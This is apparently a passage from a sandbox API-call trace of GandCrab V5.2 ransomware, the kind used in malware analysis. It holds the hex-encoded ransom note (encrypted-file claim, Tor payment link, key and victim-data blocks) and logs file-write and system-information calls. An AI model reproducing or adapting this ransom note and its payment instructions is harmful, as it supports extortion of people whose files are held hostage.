(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.817] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0069.818] CloseHandle (hObject=0x2c4) returned 1 [0069.818] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.819] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.819] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x89)) [0069.819] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.819] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.819] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.819] wsprintfW (in: param_1=0x25d0000, 